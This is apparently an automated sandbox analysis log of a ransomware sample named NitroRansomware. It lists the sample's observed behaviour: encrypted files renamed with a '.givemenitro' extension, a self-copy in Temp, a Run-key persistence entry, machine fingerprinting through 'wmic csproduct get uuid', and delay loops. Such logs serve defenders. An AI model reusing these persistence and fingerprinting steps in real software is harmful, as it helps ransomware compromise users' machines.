            Source: 12057ad2.exe, 00000000.00000002.573245746.000000000142A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 12057ad2.exe
            Source: 12057ad2.exe, 00000000.00000003.304957981.000000000149C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNitroRansomware.exe@ vs 12057ad2.exe
            Source: 12057ad2.exe, 00000000.00000000.303857775.0000000000C72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNitroRansomware.exe@ vs 12057ad2.exe
            Source: 12057ad2.exe, 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNitroRansomware.exe@ vs 12057ad2.exe
            Source: 12057ad2.exe, 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs 12057ad2.exe
            Source: 12057ad2.exe, 00000004.00000002.574244055.00000000023C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hl,\\StringFileInfo\\000004B0\\OriginalFilename vs 12057ad2.exe
            Source: 12057ad2.exe, 00000004.00000002.572263031.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 12057ad2.exe
            Source: 12057ad2.exeBinary or memory string: OriginalFilenameNitroRansomware.exe@ vs 12057ad2.exe
            Source: 12057ad2.exe.0.drBinary or memory string: OriginalFilenameNitroRansomware.exe@ vs 12057ad2.exe
            Source: 12057ad2.exeReversingLabs: Detection: 92%
            Source: 12057ad2.exeVirustotal: Detection: 61%
            Source: 12057ad2.exeMetadefender: Detection: 54%
            Source: C:\Users\user\Desktop\12057ad2.exeFile read: C:\Users\user\Desktop\12057ad2.exeJump to behavior
            Source: 12057ad2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\12057ad2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\12057ad2.exe "C:\Users\user\Desktop\12057ad2.exe"
            Source: C:\Users\user\Desktop\12057ad2.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\12057ad2.exe "C:\Users\user\AppData\Local\Temp\12057ad2.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\12057ad2.exe "C:\Users\user\AppData\Local\Temp\12057ad2.exe"
            Source: C:\Users\user\Desktop\12057ad2.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeFile created: C:\Users\user\Documents\AQRFEVRTGL.jpg.givemenitroJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeFile created: C:\Users\user\AppData\Local\Temp\12057ad2.exeJump to behavior
            Source: classification engineClassification label: mal100.rans.troj.winEXE@8/56@7/4
            Source: C:\Users\user\Desktop\12057ad2.exeFile read: C:\Users\user\Pictures\desktop.iniJump to behavior
            Source: 12057ad2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\12057ad2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1604:120:WilError_01
            Source: 12057ad2.exe, Crypto.csCryptographic APIs: 'CreateDecryptor'
            Source: 12057ad2.exe.0.dr, Crypto.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.0.12057ad2.exe.c60000.0.unpack, Crypto.csCryptographic APIs: 'CreateDecryptor'
            Source: C:\Users\user\Desktop\12057ad2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: 12057ad2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 12057ad2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 12057ad2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\asbib\Desktop\Nitro-Ransomware-master\NitroRansomware\obj\Debug\NitroRansomware.pdb source: 12057ad2.exe, 12057ad2.exe.0.dr
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06ACF6E0 pushad ; iretd 4_2_06ACF6E1
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06ACEE18 pushad ; retf 4_2_06ACEE19
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06ACEE1A push esp; retf 4_2_06ACEE21
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06AC61F8 push 3804B163h; iretd 4_2_06AC61FD
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CE9651 push eax; mov dword ptr [esp], edx4_2_06CE9664
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 4_2_06CE5830 push es; ret 4_2_06CE58B0
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_06B261F8 push 38052263h; iretd 5_2_06B261FD
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeCode function: 5_2_08089EBA push eax; mov dword ptr [esp], edx5_2_08089ECC
            Source: 12057ad2.exeStatic PE information: 0xEB227BDA [Mon Jan 3 15:08:10 2095 UTC]
            Source: C:\Users\user\Desktop\12057ad2.exeFile created: C:\Users\user\AppData\Local\Temp\12057ad2.exeJump to dropped file
            Source: C:\Users\user\Desktop\12057ad2.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NRJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NRJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 6112Thread sleep count: 9674 > 30Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -12912720851596678s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -200000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99858s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99731s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99624s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99136s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -98884s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -98753s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -98609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99670s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99702s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99827s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exe TID: 5280Thread sleep time: -99694s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe TID: 4212Thread sleep time: -23980767295822402s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe TID: 5336Thread sleep count: 286 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe TID: 6052Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe TID: 3540Thread sleep count: 9528 > 30Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeWindow / User API: threadDelayed 9674Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeWindow / User API: threadDelayed 9546Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeWindow / User API: threadDelayed 9528Jump to behavior
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Users\user\Desktop\12057ad2.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99858Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99731Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99624Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99500Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99390Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99265Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99136Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99031Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 98884Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 98753Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 98609Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99890Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99781Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99670Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99921Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99812Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99702Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99937Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99827Jump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeThread delayed: delay time: 99694Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 12057ad2.exe, 00000000.00000002.573733788.00000000014A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
            Source: C:\Users\user\Desktop\12057ad2.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeQueries volume information: C:\Users\user\Desktop\12057ad2.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\12057ad2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\12057ad2.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\12057ad2.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
